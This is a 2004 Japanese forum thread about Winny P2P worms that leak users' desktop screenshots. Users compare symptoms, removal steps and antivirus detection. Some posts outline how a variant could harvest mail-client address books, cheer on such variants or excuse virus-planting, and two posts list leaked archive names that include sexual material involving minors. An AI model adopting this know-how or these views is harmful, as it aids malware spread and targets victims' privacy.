なんで存在しないと断言できるの?

240 :[名無し]さん(bin+cue).rar:04/11/07 02:19:03 ID:riUBtazw
>>237
だからー言ってんだろ。既出の情報だけ信じるなって。
亜種なんだよ亜種。
お前が踏んだのがキャッシュかしてからうpするウイルスだったらどーすんの?
例え表で何も悪さしてないように見えても他に隠れてなにしてるかわからんのよ?
前のがいい例だろ。対策ばっちしとのほほんとしてた奴らが時間差であぼーん。
そんなウイルスだったらどーすんの?
よく開き直られるな。

241 :[名無し]さん(bin+cue).rar:04/11/07 02:20:34 ID:Y2fibRiB
人ごとだと思うとチョー楽しい。

242 :[名無し]さん(bin+cue).rar:04/11/07 02:21:00 ID:46SsnBPq
で、ジョン様はもう過去のウイルスですか?

243 :[名無し]さん(bin+cue).rar:04/11/07 02:31:15 ID:6icDUURQ
かなりアホなこと聞くけど、ギャラクシーの晒されたJpg自体はみても安全なんですかい?

244 :[名無し]さん(bin+cue).rar:04/11/07 02:37:42 ID:DLnLpLzH
>>243
たぶん、今のとこは…システム的にはそんなに危険じゃない(jpegの脆弱性については対策しとけ)
そのうちjpeg偽装のexeが混在してくる予感。見たことによる健康的な危険(気分が悪くなるとか)
および社会的な危険(見てはならぬものを見てしまう)は未知数。あえて収集しないことを薦めるが…

245 :[名無し]さん(bin+cue).rar:04/11/07 02:38:02 ID:1vZktLLi
引っかかってる連中見てるとウィルス感染を察してもnyは止めないってところが
馬鹿というかなんと言うか…

246 :[名無し]さん(bin+cue).rar:04/11/07 02:39:02 ID:HTbc3aTD
exe ファイル 捨てたい
(応答なし)

247 :[名無し]さん(bin+cue).rar:04/11/07 02:41:57 ID:4Glrn9xE
外に投げ捨てろ

248 :[名無し]さん(bin+cue).rar:04/11/07 02:43:23 ID:riUBtazw
>>245
ID:FajhENk7見たいにテンプレに書いてあること全てやって
症状なくなったから平気だと思ってny起動しちゃうんでしょ。
壁紙が変わってるのにnyやってる奴は問題外だけど。

249 :243:04/11/07 02:44:16 ID:6icDUURQ
>>244
どうもです。

収集じゃねーんです。おれもユーザー名Adminにしてるから不安になって一枚見たんです。
いくら一般的な名前とはいえ大文字小文字の位置まで完全一致だから。
検索にも大量にかかった(無視されなかった)し、regeditは生きてたし、
Regの中身みても、ノートンしかいなかったんでまあ大丈夫かなとは思ったけど。
(そもそも「レジストリエディタをメモ帳で上書き」ってどういう状況かがわかんないけどまあ普通に起動はした。)

まあ、俺の受けた市外は精神衛生上ってとこなのかな。今のとこ。

250 :249:04/11/07 02:45:44 ID:6icDUURQ
×市外
○被害
どんなミスやねん。

251 :[名無し]さん(bin+cue).rar:04/11/07 02:48:48 ID:mAMlekj2
>>238
キンタマは発想が画期的だった
今でてきてるのはどれも二番煎じだから対策は見えてるんで騒ぎにはならない

252 :[名無し]さん(bin+cue).rar:04/11/07 02:52:25 ID:61PZ7Cer
グリーングリーン2とラグナロクオンラインをやってるやつが多いな・・・

253 :[名無し]さん(bin+cue).rar:04/11/07 02:53:45 ID:riUBtazw
とゆーか、ネトゲやってる奴終わってるよな。
どうせROなんかだと面白がって本スレに貼ってる奴とか居るんだろ?

254 :209:04/11/07 02:59:16 ID:kCpZhge0
svchostの削除が出来ないorz
テンプレサイトに飛んで確認したやり方、

ファイル名を指定して実行
del C:\windows\system32\svchost32.exe
"del" C:\windows\system32\svchost32.exe
'del' C:\windows\system32\svchost32.exe

のどれでも削除できないです。
誰か救済を orz

255 :[名無し]さん(bin+cue).rar:04/11/07 03:02:18 ID:DLnLpLzH
>>249
いや、WinXPユーザーなら、誰でも(90%以上のユーザーが)Administrator
のログインアカウントを持ってるのだが…。そーゆーことも知らんで
地引するのは、ちょっち危険だわな。

256 :[名無し]さん(bin+cue).rar:04/11/07 03:07:38 ID:e6oasC3d
>>235
ついでにLPが入ってるとこみると炉好きの古強者でつか?


>>250
江戸っ子ハケーンw

257 :249:04/11/07 03:09:10 ID:6icDUURQ
>>255
俺のOS違うんで…。

>>254
Safeでもだめ?
俺もどっちかというとここではかなり素人なもんで、俺より詳しい人沢山いると思うけど、
夜中だし急を要するなら削除支援ソフトはどうかと。

俺は削除で困ったらコマンドプロンプトとかそういうのが苦手なので
フリーウエアの力を借りるが、
ブートの時にウイルスに先制攻撃できるかは知りませんよ。
先にウイルスが動き出して削除できないんではどうしようもない。


自己責任で。
転載許可がないのでファイル名とReadmeの最初のみ(検索されたし)

SRCpy for WIN32 Copyright (C) 1997-2004 KAZA


SRCpy は拙作 WWatch for WIN32 補助ツールとして作成されたフリーソフト
です。

Windows 起動中には「共有違反」でコピーや削除出来ない共有DLL等のフ
ァイルが存在します。SRCpy は、このようなファイルをコピーや削除するた
めのツールです。

システム系ファイルを変更または削除すると最悪の場合は、システムが起動
できなくなる場合があります。このため、SRCpy の処理内容を理解した上で
使用してください。


258 :257:04/11/07 03:10:53 ID:6icDUURQ
SafeってSafemodeです。Safenyとかじゃないんで。
わかると思うけど。

259 :[名無し]さん(bin+cue).rar:04/11/07 03:12:13 ID:Ge54tN5U
バスターのアップデート情報全くなし・・・ チン☆⌒ 凵\(\・∀・) まだぁ?

260 :[名無し]さん(bin+cue).rar:04/11/07 03:14:29 ID:e6oasC3d
>>254
・セーフモードで消す
・コマンドプロンプトで消す

つか、delをクォートで囲んでるのはどーいう了見だ?w
囲むならパスの方をダブルクォートで囲んどけ

261 :[名無し]さん(bin+cue).rar:04/11/07 03:17:18 ID:HTbc3aTD
>>259
こんな犯罪者しかかからないウイルスに対応する必要なし

262 :[名無し]さん(bin+cue).rar:04/11/07 03:42:41 ID:ciGmFjC2
一晩でレス結構伸びたけど
なんかあったの?

263 :[名無し]さん(bin+cue).rar:04/11/07 03:43:04 ID:1ShH2XFe
>>262
おまえんちさらされてるぞ

264 :[名無し]さん(bin+cue).rar:04/11/07 04:03:15 ID:wkKtNy4D
仙台見ててひとつだけ気になったので報告
もう消したから誰の奴か憶えてないけど
クラック使用と思われるup0のSSが流れてたから安心しない方がいいよ

265 :[名無し]さん(bin+cue).rar:04/11/07 04:12:15 ID:YP1G92ll
>>226
スクリーンセーバの奴でも、
%SystemRoot%\System32\network下にできたファイルを見ると、
Cookie総ざらえされてましたよ。

266 :[名無し]さん(bin+cue).rar:04/11/07 04:16:54 ID:S8sHNyIN
>>254
とりあえずさ、
ココきて質問してるやつ全員にいえるんだが


   
   前 ス レ ぐ ら い 読 め ! !



余談だが、NOD32やっと対策でたよコンチクショウ!
亜種対応はぁゃιぃけどな
ライセンス切れたら博士に戻ろう.......

267 :[名無し]さん(bin+cue).rar:04/11/07 04:21:35 ID:w4r/1m8c
>>254
それ消して死んでも知らんぞ。

268 :[名無し]さん(bin+cue).rar:04/11/07 04:55:47 ID:t97WMKYb
>>265
収集してzip化には、発動条件があるみたい(うちのは未発)

で、それだけでは[私はポート0…]とか[私には好きな…]とかへの
ネーミング+ny放流機能がないので、複合感染して発動するのか
それとも外部からポート直接叩いて拾っていくのか? 今のとこ分からん
(Y!BB回線ユーザーなどグローバルIPが直接来てるユーザーは狙われるかも)

地引でひっかかったのは、数名(4名ぐらい)に留まっているので、スクリーンセーバー偽装を
踏んだ香具師の数からすると、少なすぎ。いくつか偽装ものも拾ってみたけど、バイナリが一致
するので、同じものが流されてる。うーん。今日はこれで寝落。

>>266
先生は昨日(一昨日?)にW32.SillyP2Pとして識別済み。スクリーンセーバものは未対応

269 :[名無し]さん(bin+cue).rar:04/11/07 04:59:40 ID:GnXXCA59
SillyP2Pかw
いいネーミングだな

270 :[名無し]さん(bin+cue).rar:04/11/07 07:06:32 ID:6YnlMqdq
詰合せゲト……( ゚Д゚)ハッ

\My Documents\マイ ミュージック\かっとばせヌルポース.wav
\My Documents\My Pictures\ジョン様.bmp

とても気になるのだが、例のサクーシャ仙台感染かネタか……ネタだろうなぁ

271 :[名無し]さん(bin+cue).rar:04/11/07 07:12:36 ID:e6oasC3d
>>269
MPFCのSilly Walkを思い出したり
俺も歳だな orz

272 :[名無し]さん(bin+cue).rar:04/11/07 07:33:12 ID:YK3s+M6w
私には好きな人がいますを4つ落してみたんだが
ウイルスらしきものがない。JPG偽装なのかそれともWORD偽装なのか。
WORDなら開けたらぬるぽと書いてあるのがあやしい。

273 :[名無し]さん(bin+cue).rar:04/11/07 07:50:28 ID:r0bnTgIf
PCに本名とか入れる奴の気が知れない。
さらには、自分が男であるのにPCに女性の名前を入れるのは、もっと気が知れない

274 :[名無し]さん(bin+cue).rar:04/11/07 07:54:59 ID:61PZ7Cer
>>273
家族の名前って考え方はできんの?

275 :209:04/11/07 08:00:02 ID:kCpZhge0
世話になりました。
仕方無いんでウイルス踏んだってことを告げて再インスコできることになったw
もちろんウイルス名は適当に繕いましたがw

これを期にny止めて真っ当に生きようかな…

276 :[名無し]さん(bin+cue).rar:04/11/07 08:06:33 ID:6L8B7cBR
>>275
nyやめるなら再インスコしなくてもいいでしょ。
苺キンタマと違いnyでしかファイルを上げないわけだから
しばらくすればアンチウイルスソフトも対応するだろうし。
にもかかわらず再インスコするというのは何故か・・・
やはり気持が悪いから?

nyを止める気が無いからだ!

277 :[名無し]さん(bin+cue).rar:04/11/07 08:31:26 ID:e6oasC3d
仙台GAも完全に解析された訳じゃないからなぁ
キンタマだって初期は晒しだけと思われてたけど、DATA破壊とかACCS砲とか有ったしさ
それに罹ってるのが仙台GAだけとは限らんだろ、書き込みの具合からして

つー事で再インスコは至当だと思ったり


ま、止める気云々は概ね同意だけどな

278 :[名無し]さん(bin+cue).rar:04/11/07 08:52:19 ID:OvELnRY2
ノートンでスキャンしたら、
「感染は見つかりませんでしたが、いやらしい画像が見つかりました。」
って出ちゃうんですけど、これってどうなの?

279 :[名無し]さん(bin+cue).rar:04/11/07 08:52:48 ID:YK3s+M6w
マイドキュメント.scrをゲット
バスタ2005検出せず。AVGは検出。

280 :[名無し]さん(bin+cue).rar:04/11/07 09:04:31 ID:KkGjIdbD
やっと対策キター
w32.sillyP2Pだってさーーーーーーーーーーーーーー

281 :280:04/11/07 09:05:57 ID:KkGjIdbD
漏れがシマンテクに送ってやっと対策してくれた

282 :[名無し]さん(bin+cue).rar:04/11/07 09:12:34 ID:zjzC+GTv
>>281


283 :[名無し]さん(bin+cue).rar:04/11/07 09:12:51 ID:HuosBdwH
>>280
あーあお前、シマンテックがKに通報して
逮捕だな

284 :[名無し]さん(bin+cue).rar:04/11/07 09:16:09 ID:bXTLV34J
>>251
解凍後start upにぶちこむぬるぽーすのほうが画期的だろ。
あれはワラタ。

285 :[名無し]さん(bin+cue).rar:04/11/07 10:05:49 ID:4iIJxisD
>>281
Z

286 :[名無し]さん(bin+cue).rar:04/11/07 10:36:55 ID:ljmvW2M8
>>281
TZ


287 :[名無し]さん(bin+cue).rar:04/11/07 10:40:19 ID:xvoGIAP0
>>38
ttp://www.geocities.jp/kemkzuenc/Antinny.html

とりあえず久しぶりに更新

288 :[名無し]さん(bin+cue).rar:04/11/07 11:11:40 ID:tJ2HavN0
つかさ、ワクチン会社だってソフトハウスな訳よ。
感染者が違法行為をやってる連中だって確定してるウィルスのワクチンを
速やかにリリースすると思うかね?
むしろ出来るだけ放置しておいてやろうってのが人情でしょ。
だいたい、今まで散々人を殺したテロリストが
自分が怪我をした時は病院へ駆け込んで行って
「助けてぇ〜」みたいなもんだからな。
みっともないったらありゃしない。
ノートンは外人だから、そこら辺の人情の機微をわかってないんだろう。

289 :[名無し]さん(bin+cue).rar:04/11/07 11:20:13 ID:ur7uvTlh
>284
同意。P2Pの怪しいファイルとアーカイバDLLの脆弱性との合わせ技1本って感じだ。

290 :[名無し]さん(bin+cue).rar:04/11/07 11:30:51 ID:S8sHNyIN
>>288
ただ、言えることは
速やかにリリースしないと自社のマイナスにつながることは確かだな
そういう意味ではノートンが一番ソフトハウスだ
ノートンが外人だと言うなら他も外人だがな....

291 :[名無し]さん(bin+cue).rar:04/11/07 11:31:54 ID:vKbhGWDe
Ny利用者を晒すのは違法なのか?
ある意味正義の味方だと思うんだが
晒された奴は自業自得だからワクチンなど無用

292 :[名無し]さん(bin+cue).rar:04/11/07 11:34:17 ID:SmFtzmKj
と、金玉に引っかかった奴がこう申しております。

293 :[名無し]さん(bin+cue).rar:04/11/07 11:38:56 ID:S8sHNyIN
>>291
結論から言うと違法だ、日本はそんな国だ
感情から言うと正義の味方だが   違 法

自業自得だが金儲け考えるならこんなウイルスにも対応しないとな
そんな香具師が晒された結果買うだろ?
商売なんてそんなもん

294 :[名無し]さん(bin+cue).rar:04/11/07 11:40:38 ID:q6AUlybs
バックアップソフト?

295 :[名無し]さん(bin+cue).rar:04/11/07 11:42:49 ID:61PZ7Cer
自社のマイナスね・・・少なくとも、今回の件はエロゲが感染源なんだよな?
エロゲをny落としている奴が、アンチウイルス系のソフトに金を払っているとはとても思えないのだが。

俺もワクチンは無用だと思うよ。その程度のリスクはあって当然。

296 :[名無し]さん(bin+cue).rar:04/11/07 11:44:28 ID:q/v++7D/
>>290
ソフトを違法に導入してる連中からの評判が良くなったところで、
nyでの参照数が増えるだけでしょ?
P2Pのウィルスは放置で一向に問題ないと思うが。

それどころか京都県警には是非、
P2Pのウィルスは放置するようにとワクチンメーカーに通達を出して欲しい。
犯罪幇助ってことで、得意のいきなり逮捕でも構わないけどさ。

297 :[名無し]さん(bin+cue).rar:04/11/07 11:46:23 ID:S8sHNyIN
>>295
まー事実SS見る限りじゃAV動いてる香具師いないな(笑)
つまりそいつらが新規顧客ってことだ
今回のもそうだがレジ見張るツールあれば感染したことは一発でわかる。

て、だんだんスレ違いになってきな

298 :[名無し]さん(bin+cue).rar:04/11/07 11:46:48 ID:bWwg4m4J
この板で、296は何言ってるんだ・・・(^^;

299 :[名無し]さん(bin+cue).rar:04/11/07 11:49:55 ID:TCJOz+/q
エイズ患者は同性愛に特有の病気だから自業自得、
治療なんてしなくていい、みたいなもんか。
でも輸血やら異性間性交渉でも感染するんだよな。
P2Pのもnyやってない人にも感染したら困るよな。
そう考えると対策せざるを得ないんじゃないの?
自宅PCを子供につかわせといたら
感染してましたとか。
ny感染者当てのメールがさらされた第三者とか。

300 :[名無し]さん(bin+cue).rar:04/11/07 11:50:26 ID:ciGmFjC2
案外ソフトベンダー関係者が個人的に開発してたりしてな
それともただたんなる愉快犯かな
だとしたならばかなりの暇人だね

301 :[名無し]さん(bin+cue).rar:04/11/07 11:57:42 ID:vKbhGWDe
P2Pユーザを保護するのは結果的にP2Pによる違法行為を幇助することになる
もっともアンチウィルスソフトが対応してもNy利用者が購入するとは思えないけど
>>299
確かに非利用者が踏まないとは限らないから対応は必要かもね
結局被害を被るのは無関係の第三者で儲けるのはワクチンソフトベンダーということか
自作自演の匂いがプンプンするね

302 :[名無し]さん(bin+cue).rar:04/11/07 11:59:15 ID:S8sHNyIN
>>300
こことか、WinnyでSS見てニヤニヤしてんだよきっと

303 :[名無し]さん(bin+cue).rar:04/11/07 12:01:27 ID:61PZ7Cer
>>297
>まー事実SS見る限りじゃAV動いてる香具師いないな(笑)

某記事の中に
「アンチウイルスソフトのスキャンを行っている最中の画像が多数見つかっている」
とあるんだけど?
まぁ・・どう考えても新規顧客にはならないよ。
nyで落とすフリーのを使うだろう。

304 :[名無し]さん(bin+cue).rar:04/11/07 12:05:54 ID:S8sHNyIN
>>303
オラインスキャンとかライセンス切れだろ
○○のAVが対応速かった、○○最強
とか言いふらしだすのよ、
など希望的妄想してみる

まーヒッカルやつはバカなのは確かだな


305 :[名無し]さん(bin+cue).rar:04/11/07 12:06:38 ID:Y2fibRiB
仮にさ、ソフトハウスがウィルスしこんで放流してもなんら痛みはないよね。
頭の悪い、泥棒がひっかかるだけで。
そりゃ違法かも知れないが、誰が被害届だすんだよ。
違法ソフトをP2Pで手に入れて、実行したらPCがやられて、個人情報晒されましたって
警察にいってHDDを証拠として提出するわけか?w
せいぜい刑は罰金程度だし、逆に民事で巨額の損害賠償請求されそうだw

306 :[名無し]さん(bin+cue).rar:04/11/07 12:09:53 ID:S8sHNyIN
だんだんスレ違いになったからもう同でも言いこと書くけど
「w」って語尾につけると、どんなにえらい言っても説得力無いよな

307 :[名無し]さん(bin+cue).rar:04/11/07 12:11:58 ID:S8sHNyIN
誤字も説得力ないなorz

308 :[名無し]さん(bin+cue).rar:04/11/07 12:12:15 ID:QF4xbizt
>>306
お前だけだ


309 :[名無し]さん(bin+cue).rar:04/11/07 12:14:32 ID:S8sHNyIN
で、新型情報まだ?

310 :[名無し]さん(bin+cue).rar:04/11/07 12:19:22 ID:Q7Dea2SF
これでゲームCDのautorun+startupという前例が出来たわけだけど、
次はisoのエロDVDにでも仕込んでくるかね?
光も普及してきたし、仕込み先のファイルサイズはあまり関係なくなってきたか。

311 :[名無し]さん(bin+cue).rar:04/11/07 12:28:25 ID:AIPqE48j
初歩的な質問で恐縮なんだが
キンタマとかexeに潜んでるウィルスの事なんだけど
あれは、製品のexeプログラムにウィルスが感染するのか
exe自体がウィルスのプログラムなのか誰か教えてくれ

312 :[名無し]さん(bin+cue).rar:04/11/07 12:28:59 ID:90EbfEPM
次は普通にセットアップ画面が出てインスコできるけど、同時にウイルスにも感染…というのが出ると予想してみる。

313 :[名無し]さん(bin+cue).rar:04/11/07 12:34:16 ID:VKzsKV61
手段はどうあれ、エロで釣るのは確定だな
isoエロDVDのVIDEO_TSフォルダに偽装するのはどうだろう
再生できなくて不審に思って開く人いないかね?

314 :[名無し]さん(bin+cue).rar:04/11/07 12:35:54 ID:S8sHNyIN
>>311
今回のは両方だと前スレには書いてあったが?
俺が確認してるのはウィルス単体だけ

315 :[名無し]さん(bin+cue).rar:04/11/07 12:38:07 ID:AIPqE48j
>>314
レスどうも
いちを前レスから全部見てたつもりだが見逃していた

316 :[名無し]さん(bin+cue).rar:04/11/07 12:57:09 ID:bXTLV34J
trojanなんかの手法でエラー情報吐き出させて裏で実行ってのはよくあるらしい。

317 :[名無し]さん(bin+cue).rar:04/11/07 13:03:09 ID:md8sVPw9
http://tmp4.2ch.net/test/read.cgi/download/1099799904/l50

318 :[名無し]さん(bin+cue).rar:04/11/07 13:14:27 ID:SdcgPXyz
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 金正日 [04-11-03](ファイル詰合せ).zip
SacVidAk8o 48,291,260 f4e46a647b23a8223c9ed6e6846f29a3

参照が16540になってるけど・・・。誰がこんなに落としたんだ?

319 :[名無し]さん(bin+cue).rar:04/11/07 14:20:30 ID:FddvOyKL

漏れ以外にもC:\wingoフォルダ出来た椰子居ますか?

320 :[名無し]さん(bin+cue).rar:04/11/07 14:25:24 ID:riRLDkgz
>>319
またお前か。懲りない奴だなw

321 :[名無し]さん(bin+cue).rar:04/11/07 14:35:19 ID:63Yjv6y1
ウイルスは基本的には実行ファイルを実行
しなければ感染はしないんですか?

322 :[名無し]さん(bin+cue).rar:04/11/07 14:44:26 ID:RiGjbXQ+
>>321
ログ嫁

323 :[名無し]さん(bin+cue).rar:04/11/07 15:09:28 ID:NR/VDr/D
>>319
ノシ

324 :[名無し]さん(bin+cue).rar:04/11/07 15:14:24 ID:OYEc6pEe
>>319>>323
WORM_BAGLE.ATにやられてるんとちゃうか

325 :[名無し]さん(bin+cue).rar:04/11/07 15:16:26 ID:YoOXRmYZ
圧縮型のファイル開かなければ無問題って事でしょうか?

326 :[名無し]さん(bin+cue).rar:04/11/07 15:18:54 ID:NR/VDr/D
タスクマネージャー見たけどwingo.EXEは起動してなかった。。
ノートン先生に見てもらったんだけどね。

327 :[名無し]さん(bin+cue).rar:04/11/07 15:20:40 ID:FajhENk7
再インストールする場合、ノートンのキーはまた購入しなきゃいけないの?

328 :[名無し]さん(bin+cue).rar:04/11/07 15:32:48 ID:7GseAnmq
setup.exe踏んだら変なIDとパスワードのウィンドウが出てきたよ。
本当にやってるか分からなかったが、裏でドライブCのデータを削除しようとした。

テンプレから考えるとautorunタイプの亜種のように思える。
隠しUpフォルダは作成されてないが、system32にsetup.exeを確認。
キャッシュに作るタイプか時限式で発動かもしくはフェイクかな。

329 :[名無し]さん(bin+cue).rar:04/11/07 15:34:17 ID:t97WMKYb
さすがに日曜の午後ともなると、生暖かい香具師が多いな

330 :[名無し]さん(bin+cue).rar:04/11/07 15:42:58 ID:md8sVPw9
[041106-2153][(ショタ・堂山) ぼくのパンツどこ完全版*交換用.mpg][(ショタ)[堂山]ゆうたシリーズラスト*交換用.mpg][[ロリータ]妖精伝説][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041105-0301][mp3][三遊亭歌之介][TRICK2 #][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041105-2105][コブクロ][-][雪の降らない街(11.13発売の最新曲)(1).mp3][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-1404][(映画)][-][バトルロワイヤル.avi][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-1809][松浦亜弥【LIVE】(DVD)][コンサートツアー2003][春松リングPINK][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-0320][【無修正】【裏ビデオ】産婦人科医麻酔盗撮 19才CMモデル(13分21秒][217kbps).rm][(盗撮)][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-1658][服脱ぐなよ・・・][服脱ぐなよ・・・][服脱ぐなよ・・・][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

331 :[名無し]さん(bin+cue).rar:04/11/07 15:43:32 ID:md8sVPw9
[041106-0035][.zip][.avi][ドラマ][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-1850][【無修正】][一本道][-][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041104-1040][秋の童話 18話][いま 会いにゆきます][[韓国ドラマ]][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041107-1115][奈美12歳][木村パパ][mama][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041107-1250][映画][木村奈美][女子中学生][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041104-1154][谷村聡美][谷村 聡美][][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041104-1749][ゆず][-][友達の唄.mp3][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041104-2018][It's][eshop][Arc-shop][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

332 :[名無し]さん(bin+cue).rar:04/11/07 15:45:09 ID:6Cb7V/Ck
aikoの花風を落としたらアンチnyのAだった

今必死で消してるとこ

シングルなのにZIPって初めてだったんだけど、
これってよくある流し方なの?
とりあえず歌はちゃんと入ってた
でも歌も消すかな、むかつくし

333 :[名無し]さん(bin+cue).rar:04/11/07 15:45:34 ID:FajhENk7
system32のsetup.exeってやばいの?
これってXPのコンポーネントインストール用でしょ。

334 :[名無し]さん(bin+cue).rar:04/11/07 15:48:58 ID:RiGjbXQ+
>>333
クリック!クリック!

335 :[名無し]さん(bin+cue).rar:04/11/07 15:49:11 ID:XPleHSfw
俺はファイル共有やらないから"あんまり"関係ないな。
でもこーいうウイルスってどんな奴が作ってるのかね。
デブヲタのキモイやつなんだろうか。


336 :[名無し]さん(bin+cue).rar:04/11/07 15:54:39 ID:FajhENk7
>>334
クリックしたけどXPのコンポーネントインストールはコントロールパネルからやれ
と表示されただけ。

337 :[名無し]さん(bin+cue).rar:04/11/07 16:20:11 ID:YP1G92ll
アンチウィルスベンダーはさ、
winny自体をトロイの木馬として除去すりゃいいんだよ。

338 :[名無し]さん(bin+cue).rar:04/11/07 16:22:35 ID:VKzsKV61
>>337
お姉さん、スルドイ!!

339 :[名無し]さん(bin+cue).rar:04/11/07 16:24:59 ID:9FKJQcPJ
歯医者さんが虫歯の根治方法を見つけたとしてそれを発表するだろうか?

340 :[名無し]さん(bin+cue).rar:04/11/07 16:26:33 ID:UPEbUat6
nyを消すウィルスとして(ry

341 :[名無し]さん(bin+cue).rar:04/11/07 16:27:15 ID:VKzsKV61
Nyを削除してもコンピュータウィルスの根絶にはならないと思われ

342 :[名無し]さん(bin+cue).rar:04/11/07 16:29:08 ID:4FULB19H
どちらかというと、落としたものを削除するほうが

343 :[名無し]さん(bin+cue).rar:04/11/07 16:29:59 ID:CS3JxZqH
ν即から紛れ込んだのか知らんが、明らかにダウソの住人じゃないヤツが数人いるな。
それとも携帯から書き込んでるのか?
日曜だから仕方ないと言えば仕方ないけど。

344 :[名無し]さん(bin+cue).rar:04/11/07 16:36:48 ID:OYEc6pEe
普段からhijackThisでログを取っとくことを勧める。
いざというとき役に立つ。

345 :[名無し]さん(bin+cue).rar:04/11/07 16:38:48 ID:vHQIITP6
香ばしいのが多くなったね・・・

346 :[名無し]さん(bin+cue).rar:04/11/07 16:46:39 ID:46SsnBPq
pokotin.exe・・・・・
ぐぐっても詳細わからないお(・∀・)

347 :[名無し]さん(bin+cue).rar:04/11/07 16:56:01 ID:QF4xbizt
system32にshare.exeってのができてる。
ウィルス作ったのってShare厨じゃないの?

348 :[名無し]さん(bin+cue).rar:04/11/07 16:58:18 ID:PNKnFkfq
>>347


349 :[名無し]さん(bin+cue).rar:04/11/07 16:58:38 ID:vHQIITP6
・・・・・・

350 :[名無し]さん(bin+cue).rar:04/11/07 16:58:50 ID:OGc3rW/8
ny使っていなくても、ウィルス対策ソフト常駐、OSユーザー名は本名にしない、
プライバシー情報はデスクトップに置かず出来れば別HDDに置く。
これはPC使用する上での常識だろう。
まあ、nyユーザーで感染する人は殆ど居ないだろうが。

351 :[名無し]さん(bin+cue).rar:04/11/07 17:01:16 ID:LoV5EoEh
ユーザー名変更したけどスタートメニューの所しか
変わらないんだけどアカウント作り直さないと無理ですか?

352 :[名無し]さん(bin+cue).rar:04/11/07 17:02:37 ID:CXqgHSpV
にやにや

353 :[名無し]さん(bin+cue).rar:04/11/07 17:25:49 ID:VKzsKV61
メアド収集してデスクトップとNy利用情報をメール送信する亜種よろしく

354 :[名無し]さん(bin+cue).rar:04/11/07 17:38:56 ID:md8sVPw9
>>339
もう発表されてる

355 :[名無し]さん(bin+cue).rar:04/11/07 17:40:31 ID:THjT0VmL
>>353
それはスマートじゃないな。

デスクトップに動画ファイルとか置いてあったら、800メガとかのメール
が無差別に送信されまくることになる。メールサーバとネットにかかる
負荷がでかい。公害。大多数に体感できる迷惑をかけると愉快犯と
みなしてもらえないし、メル鯖に損害があったら、プロバイダもそれなり
に攻撃的な態度で応じるだろう。

より身近な問題として、いきなりギガサイズのメールが複数届いて自分
のメールボックスが満杯になってたりするのは嫌、って話。

あくまでny上でやるからこそのキンタマ。

356 :[名無し]さん(bin+cue).rar:04/11/07 17:42:08 ID:THjT0VmL
>>339
する。
なぜなら当人はそれで歴史に名を残すことになるし、一生それで
食っていける。歯科医療は齲歯の治療だけじゃないしな。

町の歯科医は困るかもしれないが、それは発見者には関係ない。

357 :[名無し]さん(bin+cue).rar:04/11/07 17:42:51 ID:VKzsKV61
>>355
SSって書くの忘れたてた。スマソ

358 :[名無し]さん(bin+cue).rar:04/11/07 17:44:57 ID:THjT0VmL
>>357
サイズの問題がなくても、いきなりメールが送られてくるなんて
うざいことこの上ない。メールで感染する亜種が登場するのも
予想範囲内。

あくまで「nyやってない人には(おおむね)関係ない」「そこはかと
なく自業自得っぽい」からこその「愉快犯っぽいイメージ」がある
んだよキンタマは。

359 :[名無し]さん(bin+cue).rar:04/11/07 17:45:32 ID:QF4xbizt
メアド抜くっていっても
outlookかぐらいしか抜けんだろメアドをレジストリに書き込んだりするわけじゃないから


360 :[名無し]さん(bin+cue).rar:04/11/07 17:49:22 ID:THjT0VmL
>>359
ローカルのプログラムとして動くんだから、普通に標準的なメールソフト
のアドレス帳を自動検索するだけでそれは可能。メールソフトが他の
メールソフトのアドレス帳をインポートするのとかわらない。

だからOutlookと同Express、Becky、Netscape/Mozillaメール、Eudora、
あとShurikenとか電8とか主だったの10種類くらい対応しとけばあらかた
やれること。

ひっかかるのは初心者が多いからだいたいOutlookだけでいいんだろ
うけどな実際は。

361 :[名無し]さん(bin+cue).rar:04/11/07 17:52:21 ID:glk8NoR4
>>350
別のHDDに置くってあるけど
そのHDDがPCにつながってる限り危ないと思うぞ

362 :[名無し]さん(bin+cue).rar:04/11/07 17:52:25 ID:VKzsKV61
「いきなりメールが送られてくるなんてうざいことこの上ない」
信用破壊には十分すぎる効果がありそうですね

>>359
outlookだけで大丈夫でしょう
確実に発症しなければいけないですか?

363 :[名無し]さん(bin+cue).rar:04/11/07 17:57:03 ID:tid73l/c
>>350
普通はリムーバブルディスク(フロッピーやMO)で保存するだろ

364 :[名無し]さん(bin+cue).rar:04/11/07 17:57:04 ID:+RLSwJQg
>>332
初歩すぎて誰もコメントしないから私が…。
感染者が持っているZipファイルにウイルスのExeファイルを追加してるだけ

落としたZipファイルの中に怪しいExeファイルがあっても
それを削除すれば後はとくに問題ない…今のところは。

シングルなのにZipなのはカップリングやカラオケ等収録曲全部入れるよくある手段


365 :[名無し]さん(bin+cue).rar:04/11/07 17:57:49 ID:THjT0VmL
>>362
自分がうざい思いをさせられるということを全く想定していない

366 :[名無し]さん(bin+cue).rar:04/11/07 18:00:23 ID:VXBE8+bK
だってネットでメールのやり取りをしてくれる人がいないんだもん

367 :[名無し]さん(bin+cue).rar:04/11/07 18:02:07 ID:Yz/oIu+n
>>351
http://homepage2.nifty.com/winfaq/w2k/hints.html#1247

368 :[名無し]さん(bin+cue).rar:04/11/07 18:13:20 ID:glk8NoR4
>>364
よこから質問失礼します
zipの中にexeウィルスがある場合
そのzipを解凍した時点では感染するんでしょうかぁ?
